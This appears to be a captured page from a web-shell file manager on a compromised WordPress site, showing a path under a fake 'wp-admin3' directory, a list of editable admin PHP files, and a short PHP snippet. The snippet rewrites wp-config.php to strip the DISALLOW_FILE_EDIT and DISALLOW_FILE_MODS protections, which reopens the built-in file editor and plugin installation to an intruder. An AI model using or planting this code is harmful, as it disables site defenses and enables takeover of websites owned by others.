PATH:
home
/
letacommog
/
New directory
/
wp-admin3
/
user
<?php $newpt="../../wp-config.php"; $newfile = file_get_contents($newpt); $newfile = str_replace("define('DISALLOW_FILE_EDIT', true);","",$newfile); $newfile = str_replace("define('DISALLOW_FILE_MODS', true);","",$newfile); file_put_contents($newpt,$newfile); echo "replace success.";
[+]
..
[-] admin.php
[edit]
[-] about.php
[edit]
[-] freedoms.php
[edit]
[-] privacy.php
[edit]
[-] profile.php
[edit]
[-] permalink.php
[edit]
[-] menu.php
[edit]
[-] credits.php
[edit]
[-] user-edit.php
[edit]
[-] index.php
[edit]